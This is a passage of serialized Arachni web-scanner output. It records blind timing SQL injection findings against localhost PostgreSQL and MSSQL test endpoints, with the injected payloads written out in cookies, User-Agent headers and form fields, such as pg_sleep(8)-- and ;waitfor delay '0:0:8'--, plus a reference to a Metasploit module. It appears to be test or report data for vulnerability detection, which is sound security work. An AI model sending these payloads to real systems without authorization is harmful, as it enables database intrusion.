  - timing
  - injection
  - database
  url: http://localhost:7499/postgresql/cookie/append
  var: cookie2
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: |-
      SQL code can be injected into the web application
          even though it may not be obvious due to suppression of error messages.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+valuepg_sleep(8)--
      response: {}

    id: 
    injected: cookie valuepg_sleep(8)--
    internal_modname: BlindTimingSQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: Blind (timing) SQL injection
    name: Blind SQL Injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      - 2
      :timeout: 5600.0
      :timeout_divider: 1000
      :timing_string: pg_sleep(__TIME__)--
      :skip_orig: true
      :injected_orig: pg_sleep(8)--
      :altered: cookie2
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie2: cookie valuepg_sleep(8)--
      :injected: cookie valuepg_sleep(8)--
      :combo: 
        cookie2: cookie valuepg_sleep(8)--
      :action: http://localhost:7499/postgresql/cookie/append
      :silent: true
      :regexp: ""
    references: 
      OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
      MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      Suppression of error messages leads to
          security through obscurity which is not a good practise.
          The web application needs to enforce stronger validation
          on user inputs.
    response: ""
    severity: High
    tags: 
    - sql
    - blind
    - timing
    - injection
    - database
    url: http://localhost:7499/postgresql/cookie/append
    var: cookie2
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: |-
    SQL code can be injected into the web application
        even though it may not be obvious due to suppression of error messages.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: header
  internal_modname: BlindTimingSQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: Blind (timing) SQL injection
  name: Blind SQL Injection (timing attack)
  references: 
    OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
    MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
  remedy_code: ""
  remedy_guidance: |-
    Suppression of error messages leads to
        security through obscurity which is not a good practise.
        The web application needs to enforce stronger validation
        on user inputs.
  severity: High
  tags: 
  - sql
  - blind
  - timing
  - injection
  - database
  url: http://localhost:7499/postgresql/header/straight
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: |-
      SQL code can be injected into the web application
          even though it may not be obvious due to suppression of error messages.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: pg_sleep(8)--
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: {}

    id: 
    injected: pg_sleep(8)--
    internal_modname: BlindTimingSQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: Blind (timing) SQL injection
    name: Blind SQL Injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      - 2
      :timeout: 5600.0
      :timeout_divider: 1000
      :timing_string: pg_sleep(__TIME__)--
      :skip_orig: true
      :injected_orig: pg_sleep(8)--
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: pg_sleep(8)--
      :injected: pg_sleep(8)--
      :combo: 
        User-Agent: pg_sleep(8)--
      :action: http://localhost:7499/postgresql/header/straight
      :silent: true
      :regexp: ""
    references: 
      OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
      MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      Suppression of error messages leads to
          security through obscurity which is not a good practise.
          The web application needs to enforce stronger validation
          on user inputs.
    response: ""
    severity: High
    tags: 
    - sql
    - blind
    - timing
    - injection
    - database
    url: http://localhost:7499/postgresql/header/straight
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: |-
    SQL code can be injected into the web application
        even though it may not be obvious due to suppression of error messages.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: header
  internal_modname: BlindTimingSQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: Blind (timing) SQL injection
  name: Blind SQL Injection (timing attack)
  references: 
    OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
    MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
  remedy_code: ""
  remedy_guidance: |-
    Suppression of error messages leads to
        security through obscurity which is not a good practise.
        The web application needs to enforce stronger validation
        on user inputs.
  severity: High
  tags: 
  - sql
  - blind
  - timing
  - injection
  - database
  url: http://localhost:7499/postgresql/header/append
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: |-
      SQL code can be injected into the web application
          even though it may not be obvious due to suppression of error messages.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_userpg_sleep(8)--
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: {}

    id: 
    injected: arachni_userpg_sleep(8)--
    internal_modname: BlindTimingSQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: Blind (timing) SQL injection
    name: Blind SQL Injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      - 2
      :timeout: 5600.0
      :timeout_divider: 1000
      :timing_string: pg_sleep(__TIME__)--
      :skip_orig: true
      :injected_orig: pg_sleep(8)--
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_userpg_sleep(8)--
      :injected: arachni_userpg_sleep(8)--
      :combo: 
        User-Agent: arachni_userpg_sleep(8)--
      :action: http://localhost:7499/postgresql/header/append
      :silent: true
      :regexp: ""
    references: 
      OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
      MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      Suppression of error messages leads to
          security through obscurity which is not a good practise.
          The web application needs to enforce stronger validation
          on user inputs.
    response: ""
    severity: High
    tags: 
    - sql
    - blind
    - timing
    - injection
    - database
    url: http://localhost:7499/postgresql/header/append
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: |-
    SQL code can be injected into the web application
        even though it may not be obvious due to suppression of error messages.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: form
  internal_modname: BlindTimingSQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: POST
  mod_name: Blind (timing) SQL injection
  name: Blind SQL Injection (timing attack)
  references: 
    OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
    MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
  remedy_code: ""
  remedy_guidance: |-
    Suppression of error messages leads to
        security through obscurity which is not a good practise.
        The web application needs to enforce stronger validation
        on user inputs.
  severity: High
  tags: 
  - sql
  - blind
  - timing
  - injection
  - database
  url: http://localhost:7499/mssql/form/straight
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: |-
      SQL code can be injected into the web application
          even though it may not be obvious due to suppression of error messages.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: {}

    id: 
    injected: ;waitfor delay '0:0:8'--
    internal_modname: BlindTimingSQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: POST
    mod_name: Blind (timing) SQL injection
    name: Blind SQL Injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      - 2
      :timeout: 5600.0
      :timeout_divider: 1000
      :timing_string: ;waitfor delay '0:0:__TIME__'--
      :skip_orig: true
      :injected_orig: ;waitfor delay '0:0:8'--
      :altered: input
      :element: form
      :params: 
        input: ;waitfor delay '0:0:8'--
      :follow_location: true
      :injected: ;waitfor delay '0:0:8'--
      :combo: 
        input: ;waitfor delay '0:0:8'--
      :action: http://localhost:7499/mssql/form/straight
      :silent: true
      :regexp: ""
    references: 
      OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
      MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      Suppression of error messages leads to
          security through obscurity which is not a good practise.
          The web application needs to enforce stronger validation
          on user inputs.
    response: ""
    severity: High
    tags: 
    - sql
    - blind
    - timing
    - injection
    - database
    url: http://localhost:7499/mssql/form/straight
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: |-
    SQL code can be injected into the web application
        even though it may not be obvious due to suppression of error messages.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: form
  internal_modname: BlindTimingSQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: POST
  mod_name: Blind (timing) SQL injection
  name: Blind SQL Injection (timing attack)
  references: 
    OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
    MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
  remedy_code: ""
  remedy_guidance: |-
    Suppression of error messages leads to
        security through obscurity which is not a good practise.
        The web application needs to enforce stronger validation
        on user inputs.
  severity: High
  tags: 
  - sql
  - blind
  - timing
  - injection
  - database
  url: http://localhost:7499/mssql/form/append
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: |-
      SQL code can be injected into the web application
          even though it may not be obvious due to suppression of error messages.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: {}

    id: 
    injected: default;waitfor delay '0:0:8'--
    internal_modname: BlindTimingSQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: POST
    mod_name: Blind (timing) SQL injection
    name: Blind SQL Injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      - 2
      :timeout: 5600.0
      :timeout_divider: 1000
      :timing_string: ;waitfor delay '0:0:__TIME__'--
      :skip_orig: true
      :injected_orig: ;waitfor delay '0:0:8'--
      :altered: input
      :element: form
      :params: 
        input: default;waitfor delay '0:0:8'--
      :follow_location: true
      :injected: default;waitfor delay '0:0:8'--
      :combo: 
        input: default;waitfor delay '0:0:8'--
      :action: http://localhost:7499/mssql/form/append
      :silent: true
      :regexp: ""
    references: 
      OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
      MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      Suppression of error messages leads to
          security through obscurity which is not a good practise.
          The web application needs to enforce stronger validation
          on user inputs.
    response: ""
    severity: High
    tags: 
    - sql
    - blind
    - timing
    - injection
    - database
    url: http://localhost:7499/mssql/form/append
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: |-
    SQL code can be injected into the web application
        even though it may not be obvious due to suppression of error messages.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: link
  internal_modname: BlindTimingSQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: Blind (timing) SQL injection
  name: Blind SQL Injection (timing attack)
  references: 
    OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
    MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
  remedy_code: ""
  remedy_guidance: |-
    Suppression of error messages leads to
        security through obscurity which is not a good practise.
        The web application needs to enforce stronger validation
        on user inputs.
  severity: High
  tags: 
  - sql
  - blind
  - timing
  - injection
  - database
  url: http://localhost:7499/mssql/link/straight?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: |-
      SQL code can be injected into the web application
          even though it may not be obvious due to suppression of error messages.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: {}

    id: 
    injected: ;waitfor delay '0:0:8'--
    internal_modname: BlindTimingSQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: Blind (timing) SQL injection
    name: Blind SQL Injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      - 2
      :timeout: 5600.0
      :timeout_divider: 1000
      :timing_string: ;waitfor delay '0:0:__TIME__'--
      :skip_orig: true
      :injected_orig: ;waitfor delay '0:0:8'--
      :altered: input
      :element: link
      :params: 
        input: ;waitfor delay '0:0:8'--
      :follow_location: true
      :injected: ;waitfor delay '0:0:8'--
      :combo: 
        input: ;waitfor delay '0:0:8'--
      :action: http://localhost:7499/mssql/link/straight?input=default
      :silent: true
      :regexp: ""
    references: 
      OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
      MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      Suppression of error messages leads to
          security through obscurity which is not a good practise.
          The web application needs to enforce stronger validation
          on user inputs.
    response: ""
    severity: High
    tags: 
    - sql
    - blind
    - timing
    - injection
    - database
    url: http://localhost:7499/mssql/link/straight?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: |-
    SQL code can be injected into the web application
        even though it may not be obvious due to suppression of error messages.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: link
  internal_modname: BlindTimingSQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: Blind (timing) SQL injection
  name: Blind SQL Injection (timing attack)
  references: 
    OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
    MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
  remedy_code: ""
  remedy_guidance: |-
    Suppression of error messages leads to
        security through obscurity which is not a good practise.
        The web application needs to enforce stronger validation
        on user inputs.
  severity: High
  tags: 
  - sql
  - blind
  - timing
  - injection
  - database
  url: http://localhost:7499/mssql/link/append?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: |-
      SQL code can be injected into the web application
          even though it may not be obvious due to suppression of error messages.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: {}

    id: 
    injected: default;waitfor delay '0:0:8'--
    internal_modname: BlindTimingSQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: Blind (timing) SQL injection
    name: Blind SQL Injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      - 2
      :timeout: 5600.0
      :timeout_divider: 1000
      :timing_string: ;waitfor delay '0:0:__TIME__'--
      :skip_orig: true
      :injected_orig: ;waitfor delay '0:0:8'--
      :altered: input
      :element: link
      :params: 
        input: default;waitfor delay '0:0:8'--
      :follow_location: true
      :injected: default;waitfor delay '0:0:8'--
      :combo: 
        input: default;waitfor delay '0:0:8'--
      :action: http://localhost:7499/mssql/link/append?input=default
      :silent: true
      :regexp: ""
    references: 
      OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
      MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      Suppression of error messages leads to
          security through obscurity which is not a good practise.
          The web application needs to enforce stronger validation
          on user inputs.
    response: ""
    severity: High
    tags: 
    - sql
    - blind
    - timing
    - injection
    - database
    url: http://localhost:7499/mssql/link/append?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: |-
    SQL code can be injected into the web application
        even though it may not be obvious due to suppression of error messages.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: cookie
  internal_modname: BlindTimingSQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: Blind (timing) SQL injection
  name: Blind SQL Injection (timing attack)
  references: 
    OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
    MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
  remedy_code: ""
  remedy_guidance: |-
    Suppression of error messages leads to
        security through obscurity which is not a good practise.
        The web application needs to enforce stronger validation
        on user inputs.
  severity: High
  tags: 
  - sql
  - blind
  - timing
  - injection
  - database
  url: http://localhost:7499/mssql/cookie/straight
  var: cookie
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: |-
      SQL code can be injected into the web application
          even though it may not be obvious due to suppression of error messages.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=%3Bwaitfor+delay+'0:0:8'--;cookie2=cookie+value
      response: {}

    id: 
    injected: ;waitfor delay '0:0:8'--
    internal_modname: BlindTimingSQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: Blind (timing) SQL injection
    name: Blind SQL Injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      - 2
      :timeout: 5600.0
      :timeout_divider: 1000
      :timing_string: ;waitfor delay '0:0:__TIME__'--
      :skip_orig: true
      :injected_orig: ;waitfor delay '0:0:8'--
      :altered: cookie
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie: ;waitfor delay '0:0:8'--
      :injected: ;waitfor delay '0:0:8'--
      :combo: 
        cookie: ;waitfor delay '0:0:8'--
      :action: http://localhost:7499/mssql/cookie/straight
      :silent: true
      :regexp: ""
    references: 
      OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
      MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      Suppression of error messages leads to
          security through obscurity which is not a good practise.
          The web application needs to enforce stronger validation
          on user inputs.
    response: ""
    severity: High
    tags: 
    - sql
    - blind
    - timing
    - injection
    - database
    url: http://localhost:7499/mssql/cookie/straight
    var: cookie
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: |-
    SQL code can be injected into the web application
        even though it may not be obvious due to suppression of error messages.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: cookie
  internal_modname: BlindTimingSQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: Blind (timing) SQL injection
  name: Blind SQL Injection (timing attack)
  references: 
    OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
    MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
  remedy_code: ""
  remedy_guidance: |-
    Suppression of error messages leads to
        security through obscurity which is not a good practise.
        The web application needs to enforce stronger validation
        on user inputs.
  severity: High
  tags: 
  - sql
  - blind
  - timing
  - injection
  - database
  url: http://localhost:7499/mssql/cookie/append
  var: cookie2
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: |-
      SQL code can be injected into the web application
          even though it may not be obvious due to suppression of error messages.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value%3Bwaitfor+delay+'0:0:8'--
      response: {}

    id: 
    injected: cookie value;waitfor delay '0:0:8'--
    internal_modname: BlindTimingSQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: Blind (timing) SQL injection
    name: Blind SQL Injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      - 2
      :timeout: 5600.0
      :timeout_divider: 1000
      :timing_string: ;waitfor delay '0:0:__TIME__'--
      :skip_orig: true
      :injected_orig: ;waitfor delay '0:0:8'--
      :altered: cookie2
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie2: cookie value;waitfor delay '0:0:8'--
      :injected: cookie value;waitfor delay '0:0:8'--
      :combo: 
        cookie2: cookie value;waitfor delay '0:0:8'--
      :action: http://localhost:7499/mssql/cookie/append
      :silent: true
      :regexp: ""
    references: 
      OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
      MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      Suppression of error messages leads to
          security through obscurity which is not a good practise.
          The web application needs to enforce stronger validation
          on user inputs.
    response: ""
    severity: High
    tags: 
    - sql
    - blind
    - timing
    - injection
    - database
    url: http://localhost:7499/mssql/cookie/append
    var: cookie2
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: |-
    SQL code can be injected into the web application
        even though it may not be obvious due to suppression of error messages.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: header
  internal_modname: BlindTimingSQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: Blind (timing) SQL injection
  name: Blind SQL Injection (timing attack)
  references: 
    OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
    MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
  remedy_code: ""
  remedy_guidance: |-
    Suppression of error messages leads to
        security through obscurity which is not a good practise.
        The web application needs to enforce stronger validation
        on user inputs.
  severity: High
  tags: 
  - sql
  - blind
  - timing
  - injection
  - database
  url: http://localhost:7499/mssql/header/straight
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: |-
      SQL code can be injected into the web application
          even though it may not be obvious due to suppression of error messages.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: ;waitfor delay '0:0:8'--
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: {}

    id: 
    injected: ;waitfor delay '0:0:8'--
    internal_modname: BlindTimingSQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: Blind (timing) SQL injection
    name: Blind SQL Injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      - 2
      :timeout: 5600.0
      :timeout_divider: 1000
      :timing_string: ;waitfor delay '0:0:__TIME__'--
      :skip_orig: true
      :injected_orig: ;waitfor delay '0:0:8'--
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: ;waitfor delay '0:0:8'--
      :injected: ;waitfor delay '0:0:8'--
      :combo: 
        User-Agent: ;waitfor delay '0:0:8'--
      :action: http://localhost:7499/mssql/header/straight
      :silent: true
      :regexp: ""
    references: 
      OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
      MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      Suppression of error messages leads to
          security through obscurity which is not a good practise.
          The web application needs to enforce stronger validation
          on user inputs.
    response: ""
    severity: High
    tags: 
    - sql
    - blind
    - timing
    - injection
    - database
    url: http://localhost:7499/mssql/header/straight
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: |-
    SQL code can be injected into the web application
        even though it may not be obvious due to suppression of error messages.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: header
  internal_modname: BlindTimingSQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: Blind (timing) SQL injection
  name: Blind SQL Injection (timing attack)
  references: 
    OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
    MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
  remedy_code: ""
  remedy_guidance: |-
    Suppression of error messages leads to
        security through obscurity which is not a good practise.
        The web application needs to enforce stronger validation
        on user inputs.
  severity: High
  tags: 
  - sql
  - blind
  - timing
  - injection
  - database
  url: http://localhost:7499/mssql/header/append
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: |-
      SQL code can be injected into the web application
          even though it may not be obvious due to suppression of error messages.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user;waitfor delay '0:0:8'--
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: {}

    id: 
    injected: arachni_user;waitfor delay '0:0:8'--
